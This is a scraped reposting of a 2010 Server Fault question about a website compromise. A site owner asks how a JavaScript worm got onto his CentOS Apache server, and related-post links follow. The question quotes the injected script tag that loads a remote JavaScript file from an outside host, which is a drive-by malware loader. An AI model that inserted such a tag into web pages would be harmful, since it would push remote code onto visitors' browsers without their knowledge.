JS Worm : how to find the entry point

Posted by Cédric Girard on Server Fault See other posts from Server Fault or by Cédric Girard
Published on 2010-06-14T08:28:23Z Indexed on 2010/06/14 8:33 UTC
Read the original article Hit count: 308

Filed under:

worm

Hi,

my site is tagged as dangerous by Google / StopBadware.org, and I found this in severals js/html files :

<script type="text/javascript" src="http://oployau.fancountblogger.com:8080/Gigahertz.js"></script>
<!--a0e2c33acd6c12bdc9e3f3ba50c98197-->

I cleaned severals files, I restore a backup but how to understand how the worm had been installed? What can I look for in log files? This server, a Centos 5, is only used as an apache server, with ours programs, a tikiwiki, a drupal installed.

Thanks
Cédric

Related posts about JavaScript

CHAT ROOMs 7 by 6

as seen on Stack Overflow - Search for 'Stack Overflow'
I am looking for chatroom on one page with 7 loggedin users and 6+rows for say 42 users.these users will keep on adding wthnew users.Need urgent help.A PRETTY UNUSUAL Q FOR MOST OF U.What is MORE REQ new features: Usernames are unique to users currently chatting You can see a "currently chatting"… >>> More
Integrating JavaScript Unit Tests with Visual Studio

as seen on Stephen Walter - Search for 'Stephen Walter'
Modern ASP.NET web applications take full advantage of client-side JavaScript to provide better interactivity and responsiveness. If you are building an ASP.NET application in the right way, you quickly end up with lots and lots of JavaScript code. When writing server code, you should be writing… >>> More
Has Javascript developed beyond what it was originally designed to do?

as seen on Programmers - Search for 'Programmers'
I've been talking with a friend about the purpose of Javascript, when and how it should be used, etc. He quoted that: JavaScript was designed to add interactivity to HTML pages [...] JavaScript gives HTML designers a programming tool HTML authors are normally not programmers… >>> More
PHP, javascript, single quote problems with IE when passing variable from ajax post to javascript fu

as seen on Stack Overflow - Search for 'Stack Overflow'
Hi! I have been trying to get this to work for a while, and I suspect there's an easy solution that I just can't find. My head feels like jelly and I would really appreciate any help. My main page.php makes a .post() to backend.php and fetches a list of cities which it echoes in the form of: <li… >>> More
Javascript in XSL that is loaded by Javascript

as seen on Stack Overflow - Search for 'Stack Overflow'
Is there anyway to have javascript run when a XSL sheet has been applied to an XML file by Javascript? I am using a JQuery plugin to apply the sheet to the xml but the javascript that is located inside of the XSL file will not run. I put the Javascript at the bottom of the file and it still does… >>> More

Developer IT

JS Worm : how to find the entry point - Developer IT

JS Worm : how to find the entry point

JavaScript

worm

Related posts about JavaScript

CHAT ROOMs 7 by 6

Integrating JavaScript Unit Tests with Visual Studio

Has Javascript developed beyond what it was originally designed to do?

PHP, javascript, single quote problems with IE when passing variable from ajax post to javascript fu

Javascript in XSL that is loaded by Javascript

Related posts about worm

Determine how the worm spread in the network

2/8/10: Tiotua-CH Windows Worm--And Other New Threats

Yahoo Messenger Worm Weasels Way into PCs

Messenger Worm Preys On Users' Trust

2/8/10: Tiotua-CH Windows Worm--And Other New Threats

Categories cloud